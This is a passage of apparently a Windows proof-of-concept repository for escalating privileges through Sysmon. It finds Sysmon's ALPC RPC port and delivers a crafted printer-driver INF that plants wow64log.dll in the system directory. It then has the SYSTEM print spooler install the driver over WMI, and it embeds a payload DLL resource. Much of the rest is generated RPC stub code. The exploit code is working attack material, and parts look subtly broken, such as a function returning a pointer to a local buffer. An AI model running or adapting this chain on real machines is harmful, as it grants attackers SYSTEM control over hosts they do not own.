    InitializeObjectAttributes(&obj, &unicode_string, 0, 0, 00);
    NTSTATUS result = pNtOpenDirectoryObect(&rpccontrolobj, 0x0001 | 0x0002, &obj);
    if (result == 0) {

        BYTE* buffer = (BYTE*)malloc(100000);

        ULONG start = 0, index = 0, bytes;
        BOOLEAN restart = TRUE;
        for (;;)
        {
            result = pNtQueryDirectoryObject(rpccontrolobj, (PBYTE)buffer, 100000, FALSE, restart, &index, &bytes);
            if (result == 0)
            {
                POBJECT_DIRECTORY_INFORMATION objectlist = (POBJECT_DIRECTORY_INFORMATION)buffer;
                for (ULONG i = 0; i < index - start; i++)
                {
                    if (0 == wcsncmp(objectlist[i].TypeName.Buffer, L"ALPC Port", objectlist[i].TypeName.Length / sizeof(WCHAR)))
                    {
                        if (wcsstr(objectlist[i].Name.Buffer, L"syscliprpc")) {
                            return objectlist[i].Name.Buffer;

                        }


                    }
                }
            }
            if (STATUS_MORE_ENTRIES == result)
            {
                start = index;
                restart = FALSE;
                continue;
            }

            else if (STATUS_NO_MORE_ENTRIES == 0 || (result == 0)) {
                CloseHandle(rpccontrolobj);
                break;



            }
        }
        return NULL;
    }
    return NULL;
}

void Trigger(LPWSTR alpc)
{
    RPC_STATUS status;
    RPC_WSTR StringBinding;
    RPC_BINDING_HANDLE Binding;
    wchar_t data[] = L"; Windows Inbox Printer Drivers\n\n[Version]\nSignature=\"$Windows NT$\"\nProvider=\"Microsoft\"\nClassGUID={4D36E979-E325-11CE-BFC1-08002BE10318}\nClass=Printer\nCatalogFile=prnge001.cat\nDriverVer = 06/21/2006,10.0.19041.1\n\n\n[Manufacturer]\n\"Generic\"=Generic,NTamd64\n\n[Test.CopyFiles]\nwow64log.dll,TTY.DLL,,4\n\n[Test.CopyFiles.security]\n\"D:AI(A;;GA;;;SY)(A;;GA;;;AU)(A;;GA;;;BA)\"\n\n\n[Generic.NTamd64]\n\"Generic / Text Only\"                                         = TTY.GPD,GenericGeneric_/_Tex8040,Generic_/_Text_Only\n\"Generic IBM Graphics 9pin\"                                   = GENIBM9.GPD,GenericGeneric_IBM_GD35A,Generic_IBM_Graphics_9pin\n\"Generic IBM Graphics 9pin wide\"                              = GENIBM9W.GPD,GenericGeneric_IBM_GC7D5,Generic_IBM_Graphics_9pin_wide\n\"MS Publisher Color Printer\"                                  = MSGENCOL.PPD,GenericMS_Publisher_25C7,MS_Publisher_Color_Printer\n\"MS Publisher Imagesetter\"                                    = 
MSGENBW.PPD,GenericMS_Publisher_B397,MS_Publisher_Imagesetter\n\n\n[TTY.GPD]\nCopyFiles=@TTYRES.DLL,@TTY.INI,@TTY.DLL,@TTYUI.DLL,@TTY.GPD,@TTYUI.HLP\nCopyFiles=Test.CopyFiles\nDataFile=TTY.GPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\"\n\n[GENIBM9.GPD]\nCopyFiles=@OK9IBRES.DLL,@GENIBM9.GPD\nDataFile=GENIBM9.GPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\"\n\n[GENIBM9W.GPD]\nCopyFiles=@OK9IBRES.DLL,@GENIBM9W.GPD\nDataFile=GENIBM9W.GPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\"\n\n[MSGENCOL.PPD]\nCopyFiles=@MSGENCOL.PPD\nDataFile=MSGENCOL.PPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\"\n\n[MSGENBW.PPD]\nCopyFiles=@MSGENBW.PPD\nDataFile=MSGENBW.PPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\"\n\n[DestinationDirs]\nDefaultDestDir=66000\nTest.CopyFiles=11\n\n[SourceDisksFiles]\nMSGENBW.PPD  = 1\nTTY.DLL      = 1\nTTYUI.HLP    = 1\nGENIBM9W.GPD = 1\nTTY.INI      = 1\nMSGENCOL.PPD = 1\nGENIBM9.GPD  = 1\nOK9IBRES.DLL = 1\nTTYUI.DLL    = 1\nTTYRES.DLL   = 1\nTTY.GPD      = 1\n\n[PrinterPackageInstallation.amd64]\nPackageAware=TRUE\nCoreDriverDependencies={D20EA372-DD35-4950-9ED8-A6335AFE79F0},{D20EA372-DD35-4950-9ED8-A6335AFE79F1}\nInboxVersionRequired=UseDriverVer\n\n[Strings]\n;Non-Localizable\n\n;Localizable\nDisk1=\"Windows Installation Disc\"\n\n[SourceDisksNames.x86]\n1   = %Disk1%,,,\"I386\"\n\n[SourceDisksNames.amd64]\n1   = %Disk1%,,,\"Amd64\"\n\n[SourceDisksNames.ia64]\n1   = %Disk1%,,,\"Ia64\"\n\n[SourceDisksNames.arm]\n1   = %Disk1%,,,\"arm\"\n\n[SourceDisksNames.arm64]\n1   = %Disk1%,,,\"arm64\"\n";
    status = RpcStringBindingCompose(NULL, (RPC_WSTR)L"ncalrpc", NULL, (RPC_WSTR)alpc, NULL, &StringBinding);

    status = RpcBindingFromStringBinding(StringBinding, &Binding);
    status = RpcStringFree(&StringBinding);
    RpcTryExcept
    {
        
        Proc1(Binding, 3036,data);
    }
    RpcExcept(EXCEPTION_EXECUTE_HANDLER);
    {
        printf("Error: %d\n",RpcExceptionCode());
    }
    RpcEndExcept

        status = RpcBindingFree(&Binding);
}



LPWSTR  BuildPath(LPCWSTR path) {
    wchar_t ntpath[MAX_PATH];
    swprintf(ntpath, L"\\??\\%s", path);
    return ntpath;
}
// Ask the print spooler (running as SYSTEM) to install the "Generic / Text Only"
// driver from the INF in the driver store, via the MSFT_PrinterDriver.Add WMI
// method in ROOT\StandardCimv2. The spooler processes the INF's CopyFiles
// sections with its own privileges, which is what makes this the final step of
// the chain. All COM objects and strings are released on every exit path.
BOOL AddPrinterDriverWmi() {
    BOOL ok = FALSE;
    HRESULT hr;
    IWbemLocator* pLoc = NULL;
    IWbemServices* pSvc = NULL;
    IWbemClassObject* pClass = NULL;
    IWbemClassObject* pInParamsDefinition = NULL;
    IWbemClassObject* pClassInstance = NULL;
    IWbemClassObject* pOutParams = NULL;
    BSTR MethodName = NULL;
    BSTR ClassName = NULL;
    VARIANT varName, varInf;
    VariantInit(&varName);
    VariantInit(&varInf);

    hr = CoInitializeEx(0, COINIT_MULTITHREADED);
    if (FAILED(hr)) {
        return FALSE;
    }
    hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);
    if (FAILED(hr)) goto cleanup;

    hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc);
    if (FAILED(hr)) goto cleanup;

    hr = pLoc->ConnectServer(_bstr_t(L"ROOT\\StandardCimv2"), NULL, NULL, 0, NULL, 0, 0, &pSvc);
    if (FAILED(hr)) goto cleanup;

    hr = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
    if (FAILED(hr)) goto cleanup;

    MethodName = SysAllocString(L"Add");
    ClassName = SysAllocString(L"MSFT_PrinterDriver");
    hr = pSvc->GetObject(ClassName, 0, NULL, &pClass, NULL);
    if (FAILED(hr)) goto cleanup;
    hr = pClass->GetMethod(MethodName, 0, &pInParamsDefinition, NULL);
    if (FAILED(hr)) goto cleanup;
    hr = pInParamsDefinition->SpawnInstance(0, &pClassInstance);
    if (FAILED(hr)) goto cleanup;

    // Method parameters: the driver name and the INF to install it from. The
    // BSTRs are owned by the VARIANTs and freed by VariantClear below.
    varName.vt = VT_BSTR;
    varName.bstrVal = SysAllocString(L"Generic / Text Only");
    varInf.vt = VT_BSTR;
    varInf.bstrVal = SysAllocString(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf");
    hr = pClassInstance->Put(L"Name", 0, &varName, 0);
    if (FAILED(hr)) goto cleanup;
    hr = pClassInstance->Put(L"InfPath", 0, &varInf, 0);
    if (FAILED(hr)) goto cleanup;

    hr = pSvc->ExecMethod(ClassName, MethodName, 0, NULL, pClassInstance, &pOutParams, NULL);
    ok = SUCCEEDED(hr);

cleanup:
    VariantClear(&varName);
    VariantClear(&varInf);
    if (ClassName) SysFreeString(ClassName);
    if (MethodName) SysFreeString(MethodName);
    if (pOutParams) pOutParams->Release();
    if (pClassInstance) pClassInstance->Release();
    if (pInParamsDefinition) pInParamsDefinition->Release();
    if (pClass) pClass->Release();
    if (pSvc) pSvc->Release();
    if (pLoc) pLoc->Release();
    CoUninitialize();
    return ok;
}
void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR*) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
    free(p);
}

================================================
FILE: v1/SysmonEoP/resource.h
================================================
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by FolderOrFileDeleteToSystem.rc
//
#define IDR_DLL1                        101

// Next default values for new objects
// 
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE        107
#define _APS_NEXT_COMMAND_VALUE         40001
#define _APS_NEXT_CONTROL_VALUE         1001
#define _APS_NEXT_SYMED_VALUE           101
#endif
#endif


================================================
FILE: v1/SysmonEoP/resource.rc
================================================
// Microsoft Visual C++ generated resource script.
//
#include "resource.h"

#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "winres.h"

/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
// English (United Kingdom) resources

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
#pragma code_page(1252)

#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//

1 TEXTINCLUDE
BEGIN
"resource.h\0"
END

2 TEXTINCLUDE
BEGIN
"#include ""winres.h""\r\n"
"\0"
END

3 TEXTINCLUDE
BEGIN
"\r\n"
"\0"
END

#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// RBS
//

IDR_DLL1                DLL                     "dll.dll"


#endif    // English (United Kingdom) resources
/////////////////////////////////////////////////////////////////////////////



#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//


/////////////////////////////////////////////////////////////////////////////
#endif    // not APSTUDIO_INVOKED


================================================
FILE: v1/SysmonEoP/sysmon.idl
================================================
// Sysmon's local RPC interface as used by the PoC. Interface, procedure and
// argument names are placeholders; Proc1 (opnum 1) takes a numeric argument and
// a NUL-terminated wide string and is the call main.cpp uses to deliver its
// payload.
[
	uuid(1e72d56f-eec6-44d3-bbed-5caa50790812),
	version(1.0),
]
interface DefaultIfName
{

	long Proc0(
	);

	void Proc1(
		[in] long arg_0,
		[in][string] wchar_t* arg_1);
}

================================================
FILE: v1/SysmonEoP/sysmon_c.c
================================================


/* this ALWAYS GENERATED file contains the RPC client stubs */


 /* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for sysmon.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#if defined(_M_AMD64)


#if _MSC_VER >= 1200
#pragma warning(push)
#endif

#pragma warning( disable: 4211 )  /* redefine extern to static */
#pragma warning( disable: 4232 )  /* dllimport identity*/
#pragma warning( disable: 4024 )  /* array to pointer mapping*/

#include <string.h>

#include "sysmon_h.h"

#define TYPE_FORMAT_STRING_SIZE   7                                 
#define PROC_FORMAT_STRING_SIZE   79                                
#define EXPR_FORMAT_STRING_SIZE   1                                 
#define TRANSMIT_AS_TABLE_SIZE    0            
#define WIRE_MARSHAL_TABLE_SIZE   0            

typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];
    } sysmon_MIDL_TYPE_FORMAT_STRING;

typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];
    } sysmon_MIDL_PROC_FORMAT_STRING;

typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
    {
    long          Pad;
    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];
    } sysmon_MIDL_EXPR_FORMAT_STRING;


static const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};

static const RPC_SYNTAX_IDENTIFIER  _NDR64_RpcTransferSyntax = 
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};



extern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;
extern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;
extern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;

#define GENERIC_BINDING_TABLE_SIZE   0            


/* Standard interface: DefaultIfName, ver. 1.0,
   GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */

 extern const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo;


static const RPC_CLIENT_INTERFACE DefaultIfName___RpcClientInterface =
    {
    sizeof(RPC_CLIENT_INTERFACE),
    {{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    0,
    0,
    0,
    0,
    &DefaultIfName_ProxyInfo,
    0x02000000
    };
RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcClientInterface;

extern const MIDL_STUB_DESC DefaultIfName_StubDesc;

static RPC_BINDING_HANDLE DefaultIfName__MIDL_AutoBindHandle;


long Proc0( 
    /* [in] */ handle_t IDL_handle)
{

    CLIENT_CALL_RETURN _RetVal;

    _RetVal = NdrClientCall3(
                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,
                  0,
                  0,
                  IDL_handle);
    return ( long  )_RetVal.Simple;
    
}


void Proc1( 
    /* [in] */ handle_t IDL_handle,
    /* [in] */ long arg_0,
    /* [string][in] */ wchar_t *arg_1)
{

    NdrClientCall3(
                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,
                  1,
                  0,
                  IDL_handle,
                  arg_0,
                  arg_1);
    
}


#if !defined(__RPC_WIN64__)
#error  Invalid build platform for this stub.
#endif

static const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =
    {
        0,
        {

	/* Procedure Proc0 */

			0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/*  2 */	NdrFcLong( 0x0 ),	/* 0 */
/*  6 */	NdrFcShort( 0x0 ),	/* 0 */
/*  8 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
/* 10 */	0x32,		/* FC_BIND_PRIMITIVE */
			0x0,		/* 0 */
/* 12 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
/* 14 */	NdrFcShort( 0x0 ),	/* 0 */
/* 16 */	NdrFcShort( 0x8 ),	/* 8 */
/* 18 */	0x44,		/* Oi2 Flags:  has return, has ext, */
			0x1,		/* 1 */
/* 20 */	0xa,		/* 10 */
			0x1,		/* Ext Flags:  new corr desc, */
/* 22 */	NdrFcShort( 0x0 ),	/* 0 */
/* 24 */	NdrFcShort( 0x0 ),	/* 0 */
/* 26 */	NdrFcShort( 0x0 ),	/* 0 */
/* 28 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Return value */

/* 30 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 32 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
/* 34 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure Proc1 */

/* 36 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 38 */	NdrFcLong( 0x0 ),	/* 0 */
/* 42 */	NdrFcShort( 0x1 ),	/* 1 */
/* 44 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
/* 46 */	0x32,		/* FC_BIND_PRIMITIVE */
			0x0,		/* 0 */
/* 48 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
/* 50 */	NdrFcShort( 0x8 ),	/* 8 */
/* 52 */	NdrFcShort( 0x0 ),	/* 0 */
/* 54 */	0x42,		/* Oi2 Flags:  clt must size, has ext, */
			0x2,		/* 2 */
/* 56 */	0xa,		/* 10 */
			0x1,		/* Ext Flags:  new corr desc, */
/* 58 */	NdrFcShort( 0x0 ),	/* 0 */
/* 60 */	NdrFcShort( 0x0 ),	/* 0 */
/* 62 */	NdrFcShort( 0x0 ),	/* 0 */
/* 64 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter arg_0 */

/* 66 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 68 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
/* 70 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter arg_1 */

/* 72 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 74 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
/* 76 */	NdrFcShort( 0x4 ),	/* Type Offset=4 */

			0x0
        }
    };

static const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =
    {
        0,
        {
			NdrFcShort( 0x0 ),	/* 0 */
/*  2 */	
			0x11, 0x8,	/* FC_RP [simple_pointer] */
/*  4 */	
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */

			0x0
        }
    };

static const unsigned short DefaultIfName_FormatStringOffsetTable[] =
    {
    0,
    36
    };



#endif /* defined(_M_AMD64)*/



/* this ALWAYS GENERATED file contains the RPC client stubs */


 /* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for sysmon.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#if defined(_M_AMD64)




#if !defined(__RPC_WIN64__)
#error  Invalid build platform for this stub.
#endif


#include "ndr64types.h"
#include "pshpack8.h"


typedef 
struct _NDR64_CONFORMANT_STRING_FORMAT
__midl_frag7_t;
extern const __midl_frag7_t __midl_frag7;

typedef 
struct _NDR64_POINTER_FORMAT
__midl_frag6_t;
extern const __midl_frag6_t __midl_frag6;

typedef 
NDR64_FORMAT_CHAR
__midl_frag5_t;
extern const __midl_frag5_t __midl_frag5;

typedef 
struct 
{
    struct _NDR64_PROC_FORMAT frag1;
    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
    struct _NDR64_PARAM_FORMAT frag3;
    struct _NDR64_PARAM_FORMAT frag4;
}
__midl_frag4_t;
extern const __midl_frag4_t __midl_frag4;

typedef 
struct 
{
    struct _NDR64_PROC_FORMAT frag1;
    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
    struct _NDR64_PARAM_FORMAT frag3;
}
__midl_frag2_t;
extern const __midl_frag2_t __midl_frag2;

typedef 
NDR64_FORMAT_UINT32
__midl_frag1_t;
extern const __midl_frag1_t __midl_frag1;

static const __midl_frag7_t __midl_frag7 =
{ 
/* *wchar_t */
    { 
    /* *wchar_t */
        0x64,    /* FC64_CONF_WCHAR_STRING */
        { 
        /* *wchar_t */
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0
        },
        (NDR64_UINT16) 2 /* 0x2 */
    }
};

static const __midl_frag6_t __midl_frag6 =
{ 
/* *wchar_t */
    0x20,    /* FC64_RP */
    (NDR64_UINT8) 0 /* 0x0 */,
    (NDR64_UINT16) 0 /* 0x0 */,
    &__midl_frag7
};

static const __midl_frag5_t __midl_frag5 =
0x5    /* FC64_INT32 */;

static const __midl_frag4_t __midl_frag4 =
{ 
/* Proc1 */
    { 
    /* Proc1 */      /* procedure Proc1 */
        (NDR64_UINT32) 17039424 /* 0x1040040 */,    /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */
        (NDR64_UINT32) 24 /* 0x18 */ ,  /* Stack size */
        (NDR64_UINT32) 8 /* 0x8 */,
        (NDR64_UINT32) 0 /* 0x0 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 2 /* 0x2 */,
        (NDR64_UINT16) 8 /* 0x8 */
    },
    { 
    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
        { 
        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
            0x72,    /* FC64_BIND_PRIMITIVE */
            (NDR64_UINT8) 0 /* 0x0 */,
            0 /* 0x0 */,   /* Stack offset */
            (NDR64_UINT8) 0 /* 0x0 */,
            (NDR64_UINT8) 0 /* 0x0 */
        },
        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */
    },
    { 
    /* arg_0 */      /* parameter arg_0 */
        &__midl_frag5,
        { 
        /* arg_0 */
            0,
            0,
            0,
            1,
            0,
            0,
            1,
            1,
            0,
            0,
            0,
            0,
            0,
            (NDR64_UINT16) 0 /* 0x0 */,
            0
        },    /* [in], Basetype, ByValue */
        (NDR64_UINT16) 0 /* 0x0 */,
        8 /* 0x8 */,   /* Stack offset */
    },
    { 
    /* arg_1 */      /* parameter arg_1 */
        &__midl_frag7,
        { 
        /* arg_1 */
            1,
            1,
            0,
            1,
            0,
            0,
            0,
            0,
            1,
            0,
            0,
            0,
            0,
            (NDR64_UINT16) 0 /* 0x0 */,
            0
        },    /* MustSize, MustFree, [in], SimpleRef */
        (NDR64_UINT16) 0 /* 0x0 */,
        16 /* 0x10 */,   /* Stack offset */
    }
};

static const __midl_frag2_t __midl_frag2 =
{ 
/* Proc0 */
    { 
    /* Proc0 */      /* procedure Proc0 */
        (NDR64_UINT32) 17301568 /* 0x1080040 */,    /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */
        (NDR64_UINT32) 16 /* 0x10 */ ,  /* Stack size */
        (NDR64_UINT32) 0 /* 0x0 */,
        (NDR64_UINT32) 8 /* 0x8 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 0 /* 0x0 */,
        (NDR64_UINT16) 1 /* 0x1 */,
        (NDR64_UINT16) 8 /* 0x8 */
    },
    { 
    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
        { 
        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
            0x72,    /* FC64_BIND_PRIMITIVE */
            (NDR64_UINT8) 0 /* 0x0 */,
            0 /* 0x0 */,   /* Stack offset */
            (NDR64_UINT8) 0 /* 0x0 */,
            (NDR64_UINT8) 0 /* 0x0 */
        },
        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */
    },
    { 
    /* long */      /* parameter long */
        &__midl_frag5,
        { 
        /* long */
            0,
            0,
            0,
            0,
            1,
            1,
            1,
            1,
            0,
            0,
            0,
            0,
            0,
            (NDR64_UINT16) 0 /* 0x0 */,
            0
        },    /* [out], IsReturn, Basetype, ByValue */
        (NDR64_UINT16) 0 /* 0x0 */,
        8 /* 0x8 */,   /* Stack offset */
    }
};

static const __midl_frag1_t __midl_frag1 =
(NDR64_UINT32) 0 /* 0x0 */;


#include "poppack.h"


static const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =
    {
    &__midl_frag2,
    &__midl_frag4
    };


static const MIDL_STUB_DESC DefaultIfName_StubDesc = 
    {
    (void *)& DefaultIfName___RpcClientInterface,
    MIDL_user_allocate,
    MIDL_user_free,
    &DefaultIfName__MIDL_AutoBindHandle,
    0,
    0,
    0,
    0,
    sysmon__MIDL_TypeFormatString.Format,
    1, /* -error bounds_check flag */
    0x60001, /* Ndr library version */
    0,
    0x801026e, /* MIDL Version 8.1.622 */
    0,
    0,
    0,  /* notify & notify_flag routine table */
    0x2000001, /* MIDL flag */
    0, /* cs routines */
    (void *)& DefaultIfName_ProxyInfo,   /* proxy/server info */
    0
    };

static const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [  2 ] = 
    {
    {
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    0,
    sysmon__MIDL_ProcFormatString.Format,
    DefaultIfName_FormatStringOffsetTable,
    sysmon__MIDL_TypeFormatString.Format,
    0,
    0,
    0
    }
    ,{
    {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},
    0,
    0 ,
    (unsigned short *) DefaultIfName_Ndr64ProcTable,
    0,
    0,
    0,
    0
    }
    };

static const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo =
    {
    &DefaultIfName_StubDesc,
    sysmon__MIDL_ProcFormatString.Format,
    DefaultIfName_FormatStringOffsetTable,
    (RPC_SYNTAX_IDENTIFIER*)&_RpcTransferSyntax,
    2,
    (MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo
    
    };

#if _MSC_VER >= 1200
#pragma warning(pop)
#endif


#endif /* defined(_M_AMD64)*/



================================================
FILE: v1/SysmonEoP/sysmon_h.h
================================================


/* this ALWAYS GENERATED file contains the definitions for the interfaces */


 /* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for sysmon.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */



/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */


#ifndef __sysmon_h_h__
#define __sysmon_h_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

/* Forward Declarations */ 

#ifdef __cplusplus
extern "C"{
#endif 


#ifndef __DefaultIfName_INTERFACE_DEFINED__
#define __DefaultIfName_INTERFACE_DEFINED__

/* interface DefaultIfName */
/* [version][uuid] */ 

long Proc0( 
    /* [in] */ handle_t IDL_handle);

void Proc1( 
    /* [in] */ handle_t IDL_handle,
    /* [in] */ long arg_0,
    /* [string][in] */ wchar_t *arg_1);



extern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec;
extern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec;
#endif /* __DefaultIfName_INTERFACE_DEFINED__ */

/* Additional Prototypes for ALL interfaces */

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif




================================================
FILE: v1/SysmonEoP/sysmon_s.c
================================================


/* this ALWAYS GENERATED file contains the RPC server stubs */


 /* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for sysmon.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 
    protocol : all , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#if defined(_M_AMD64)


#if _MSC_VER >= 1200
#pragma warning(push)
#endif

#pragma warning( disable: 4211 )  /* redefine extern to static */
#pragma warning( disable: 4232 )  /* dllimport identity*/
#pragma warning( disable: 4024 )  /* array to pointer mapping*/

#include <string.h>
#include "sysmon_h.h"

#define TYPE_FORMAT_STRING_SIZE   7                                 
#define PROC_FORMAT_STRING_SIZE   79                                
#define EXPR_FORMAT_STRING_SIZE   1                                 
#define TRANSMIT_AS_TABLE_SIZE    0            
#define WIRE_MARSHAL_TABLE_SIZE   0            

